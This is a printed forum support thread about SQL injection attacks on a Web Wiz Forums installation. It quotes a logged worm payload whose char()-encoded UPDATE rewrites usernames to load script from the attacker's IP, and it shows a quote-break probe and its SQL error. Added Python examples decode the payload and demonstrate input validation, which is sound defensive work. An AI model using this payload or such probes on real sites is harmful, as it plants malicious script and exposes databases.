
VIRUS Attack

Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=28478
Printed Date: 02 April 2026 at 12:40am
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com


Topic: VIRUS Attack
Posted By: diaperpin-jen
Subject: VIRUS Attack
Date Posted: 05 April 2010 at 1:16pm
 
 
My web site has been attacked 3 days in a row via sql injections. I spent yesterday locking down all of my code to remove the possibility of a hacker updating my database. I did NOT touch the Web Wiz forum or Newspad code because I did not want to risk making a mess of code I have not written.
 
I have many tables in my site but the only ones targeted were web wiz forums and web wiz newspad. Therefore I believe the hackers are familiar with Web Wiz table structures.
 
I am posting this note for two reasons.
 
First, to warn other web wiz customers that this is happening so you are ready just in case you are targeted as well.
 
Secondly to ask if others have had such a problem and if there are suggestions to close up any gaps, particularly from the forum or newspad code???



Replies:
Posted By: WebWiz-Bruce
Date Posted: 05 April 2010 at 1:41pm
There are no issues with SQL Injections in Web Wiz Forums or Web Wiz NewsPad.

These viruses have been around a long time and are generic, attacking the structure of any database schema, not just Web Wiz software. When they first appeared a few years ago we saw Web Wiz Forums and NewsPad installations get hit as many as 20 times per second by these SQL Injection Viruses, without causing any issues.

Over the last few years we have had a number of people who have had their databases compromised by these SQL Injection Viruses, convinced that the problem has been with Web Wiz Products; however, after lengthy investigations it has always turned out the issue was caused by their own pages outside of Web Wiz software or modifications to the software.

I can be 100% sure that your SQL Injections will not be a result of Web Wiz Forums or NewsPad. You should look at your own pages on your website and any modifications that you have made to the Web Wiz software.

Many thousands of hours have been and still are spent on security, making sure that our products are the most secure available. Each month security audits are carried out looking at new threats, and new versions are released if anything is found. For this reason many large hacking websites use our software and have also worked with us simulating attacks and looking for holes to ensure that our software is fully secure.

Web Wiz Forums and NewsPad are well protected against SQL Injection. Web Wiz Forums 9.50 and above even goes as far as detecting an SQL Injection attack from one of these viruses and, when detected, stops the page processing to reduce server load and prevent DoS attacks that could overrun a web server if a website came under a large attack from one of these SQL Injection viruses.


-------------
Web Wiz Forums Hosting - https://www.webwiz.net/web-wiz-forums/forum-hosting.htm
ASP.NET Web Hosting - https://www.webwiz.net/web-hosting/windows-web-hosting.htm


Posted By: diaperpin-jen
Date Posted: 06 April 2010 at 1:30am

The hacker is back and I was able to log the problem.

The attack was in the form of sql injection through one of the forum pages. I am listing the information I logged below:
 
Page: /forum/registration_rules.asp
IP Address: 94.102.52.27
QueryString: FID=01+update+tblAuthor+set+Username=cast(Username+as+varchar(8000))%2Bcast(char(060)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(39)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(57)%2Bchar(52)%2Bchar(46)%2Bchar(49)%2Bchar(48)%2Bchar(50)%2Bchar(46)%2Bchar(53)%2Bchar(50)%2Bchar(46)%2Bchar(50)%2Bchar(55)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(39)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))--
 
 
I want to make sure you and other Web Wiz software users are aware of this problem so you can deal with it immediately. I am in danger of having much of my data wiped out by this person. Each attack seems more and more destructive.
 
Please look into this page and lock it down best you can.
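
The logged querystring above is the usual form of this worm family: a leading numeric value, then an UPDATE whose new value is built from a chain of char(n) calls so that the injected text never appears literally in the request. The following Python is an added example, not code from the thread or from Web Wiz, that decodes such a log entry for incident-response purposes: it flags the parameter that carried SQL, names the table and column the UPDATE targets, rebuilds the char() chain into readable text, and checks whether the host the payload references is the same IP the request came from. The LOGGED_REQUEST dict is a constructed copy of the three logged fields (the char(0) padding is shortened); the page name, IP and querystring are the ones posted above.

```python
import re
from urllib.parse import unquote_plus

# Constructed copy of the three fields logged in the post above. The QueryString
# is shortened: the original continues with a long run of "%2Bchar(0)" padding
# before the closing "+as+varchar(8000))--".
LOGGED_REQUEST = {
    "page": "/forum/registration_rules.asp",
    "ip": "94.102.52.27",
    "querystring": (
        "FID=01+update+tblAuthor+set+Username=cast(Username+as+varchar(8000))"
        "%2Bcast(char(060)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)"
        "%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)"
        "%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)"
        "%2Bchar(99)%2Bchar(61)%2Bchar(39)%2Bchar(104)%2Bchar(116)%2Bchar(116)"
        "%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(57)%2Bchar(52)"
        "%2Bchar(46)%2Bchar(49)%2Bchar(48)%2Bchar(50)%2Bchar(46)%2Bchar(53)"
        "%2Bchar(50)%2Bchar(46)%2Bchar(50)%2Bchar(55)%2Bchar(47)%2Bchar(117)"
        "%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)"
        "%2Bchar(106)%2Bchar(115)%2Bchar(39)%2Bchar(62)%2Bchar(60)%2Bchar(47)"
        "%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)"
        "%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))--"
    ),
}

# T-SQL char(n) terms; the \b keeps "varchar(8000)" from matching.
CHAR_TERM = re.compile(r"\bchar\((\d+)\)", re.IGNORECASE)
# Statement keywords that have no business inside a numeric forum id.
SQL_MARKERS = re.compile(r"\b(update|insert|delete|drop|exec|union|select|cast)\b",
                         re.IGNORECASE)
UPDATE_TARGET = re.compile(r"\bupdate\s+(\w+)\s+set\s+(\w+)", re.IGNORECASE)
HOST_IN_URL = re.compile(r"https?://([^/'\"\s<>]+)")


def decode_char_chain(sql_fragment):
    """Rebuild the text hidden in a char(n)+char(n)+... concatenation,
    dropping the char(0) NUL padding this worm family appends."""
    codes = [int(n) for n in CHAR_TERM.findall(sql_fragment)]
    return "".join(chr(c) for c in codes if c != 0)


def analyse_request(entry):
    """Summarise one logged request: which parameter carried SQL, what the
    UPDATE targets, the decoded payload, and whether the payload calls back
    to the source IP of the request."""
    decoded = unquote_plus(entry["querystring"])   # '+' -> space, %2B -> '+'
    name, _, value = decoded.partition("=")        # split at the first '='
    summary = {"parameter": name, "suspicious": False, "target": None,
               "payload": None, "hosts": [], "callback_to_source_ip": False}
    if not SQL_MARKERS.search(value):
        return summary                             # plain value, nothing to decode
    summary["suspicious"] = True
    m = UPDATE_TARGET.search(value)
    if m:
        summary["target"] = f"{m.group(1)}.{m.group(2)}"
    summary["payload"] = decode_char_chain(value)
    summary["hosts"] = HOST_IN_URL.findall(summary["payload"])
    summary["callback_to_source_ip"] = entry["ip"] in summary["hosts"]
    return summary


if __name__ == "__main__":
    for key, val in analyse_request(LOGGED_REQUEST).items():
        print(f"{key:>22}: {val}")
```

Run on the logged entry, the decoded payload is a closing title tag followed by a script tag whose source is hosted on the same address the request came from, which is why each row of tblAuthor.Username would have been rewritten to pull that script into any page that displays usernames. The keyword heuristic is deliberately coarse: it is meant for triaging a log, not as an input filter for the application.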


Posted By: WebWiz-Bruce
Date Posted: 06 April 2010 at 10:40am
I have just located your website from the email address used to register on this forum and have found the issue, which is to do with your own modifications!!

I had a look at your registration_rules.asp page and passed across a non-numeric value as part of the FID querystring. I then got an error which you would not get from an unmodified Web Wiz Forums.

The error was an SQL error on line 320 of the file includes/google_adsense_inc.asp. The original includes/google_adsense_inc.asp does not have a line 320 and also does not interact with the database.

It would seem that the problem here is that you have modified the file includes/google_adsense_inc.asp to include code that interacts with the database. This code does not appear to have any protection from SQL Injection.

To fix the issue you should either fix the modified code in the includes/google_adsense_inc.as, or better still upgrade to the latest version and not modify the code.

-------------
Web Wiz Forums Hosting - https://www.webwiz.net/web-wiz-forums/forum-hosting.htm
ASP.NET Web Hosting - https://www.webwiz.net/web-hosting/windows-web-hosting.htm


Posted By: diaperpin-jen
Date Posted: 06 April 2010 at 11:43am
Yes - Thank you. I looked into this last night and saw that the hole was in google_adsense_inc.asp.
 
The error you received actually indicates that my changes worked. If you didn't get the error you would have succeeded in changing the values in my database.


Posted By: WebWiz-Bruce
Date Posted: 06 April 2010 at 12:15pm
I have just checked your forum and it is still vulnerable to an SQL Injection attack. Maybe not the one that you posted, but it is still vulnerable; see the error I got below:-

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'test and a.author_id = p.author_id  and g.group_id = a.group_id  union  select g.name as groupname, a.username, a.author_id , 2 '.


This means that my input 'test, along with the single quote break, was still used in the SQL Query. This was only a test so no harm done, but I could change this to easily display content from your database, delete tables, etc.

You need to sanitise any querystring input before it is used in an SQL Query. In this case, as you are using a numeric value passed by the FID querystring, you can use the following:-

' Only accept the FID querystring value if VBScript recognises it as numeric;
' anything else (such as a quote or SQL text) falls back to 0
If isNumeric(Request.QueryString("FID")) Then
    intForumID = CInt(Request.QueryString("FID"))   ' CInt raises an overflow error above 32767
Else
    intForumID = 0
End If


Then in your SQL reference the variable not the querystring.



-------------
Web Wiz Forums Hosting - https://www.webwiz.net/web-wiz-forums/forum-hosting.htm
ASP.NET Web Hosting - https://www.webwiz.net/web-hosting/windows-web-hosting.htm


Posted By: diaperpin-jen
Date Posted: 06 April 2010 at 12:39pm
Thanks!  I will look into it.


Posted By: diaperpin-jen
Date Posted: 06 April 2010 at 1:20pm
Fixed. I appreciate you taking the time to look at my site.  I will see how you handled text inputs as well......


Posted By: WebWiz-Bruce
Date Posted: 06 April 2010 at 2:02pm
Web Wiz Forums has a built in function for text that is to be used in SQL to filter out SQL Injections:-

strVariable = formatSQLInput(strVariable)



-------------
Web Wiz Forums Hosting - https://www.webwiz.net/web-wiz-forums/forum-hosting.htm
ASP.NET Web Hosting - https://www.webwiz.net/web-hosting/windows-web-hosting.htm
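
The two fixes in this thread, the isNumeric/CInt check for the numeric FID value and the filtering of text values before they reach SQL, are shown together below in Python against an in-memory SQLite table. This is an added example, not code from the thread or from Web Wiz: the tblForum table, its columns and rows are constructed stand-ins rather than the real schema, and the queries are illustrative. forum_name_unsafe reproduces the pattern found in the modified include (querystring text spliced straight into the statement) so that the 'test probe from the post can be seen producing the same kind of syntax error; parse_forum_id is a strict counterpart of the isNumeric check, and the two _safe functions bind the value as a parameter instead of splicing it in, which also covers the text-input case.

```python
import re
import sqlite3


def build_demo_db():
    """Constructed in-memory stand-in for a forum table; not the Web Wiz schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tblForum (Forum_ID INTEGER PRIMARY KEY, Forum_name TEXT);
        INSERT INTO tblForum VALUES (1, 'General'), (2, 'Support');
    """)
    return conn


def forum_name_unsafe(conn, raw_fid):
    """The pattern behind the modified include: the querystring value is pasted
    into the statement, so a stray quote reaches the SQL parser. Returns the
    outcome so the caller can see whether the input was read as SQL."""
    sql = "SELECT Forum_name FROM tblForum WHERE Forum_ID = " + raw_fid
    try:
        row = conn.execute(sql).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.OperationalError as err:
        return ("sql error", str(err))


def parse_forum_id(raw):
    """Strict counterpart of the isNumeric/CInt check: accept only an unsigned
    decimal integer of sane length, else fall back to 0. VBScript's IsNumeric
    also accepts forms such as "1e3" or "&H10"; those are rejected here."""
    if raw is not None and re.fullmatch(r"[0-9]{1,9}", raw.strip()):
        return int(raw)
    return 0


def forum_name_safe(conn, raw_fid):
    """Validated integer, then bound as a parameter rather than spliced in."""
    row = conn.execute("SELECT Forum_name FROM tblForum WHERE Forum_ID = ?",
                       (parse_forum_id(raw_fid),)).fetchone()
    return row[0] if row else None


def search_forums_safe(conn, term):
    """Text input: a bound parameter, so quotes inside the value are data,
    never syntax. No escaping function is needed for this path."""
    rows = conn.execute("SELECT Forum_name FROM tblForum WHERE Forum_name LIKE ?",
                        ("%" + term + "%",))
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = build_demo_db()
    for probe in ("1", "'test"):
        print("unsafe", repr(probe), "->", forum_name_unsafe(db, probe))
        print("safe  ", repr(probe), "->", forum_name_safe(db, probe))
    print("search 'en' ->", search_forums_safe(db, "en"))
    print("search \"'\" ->", search_forums_safe(db, "'"))
```

The unsafe function is there only to show what the error in the post means: the value was parsed as part of the statement. The safe path never lets the raw value near the parser, so the same probe simply maps to forum 0 and returns nothing, with no error to leak. When modifying a Web Wiz page, the VBScript equivalent is to assign the validated value to a variable and reference that variable in the SQL, as the reply above says.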


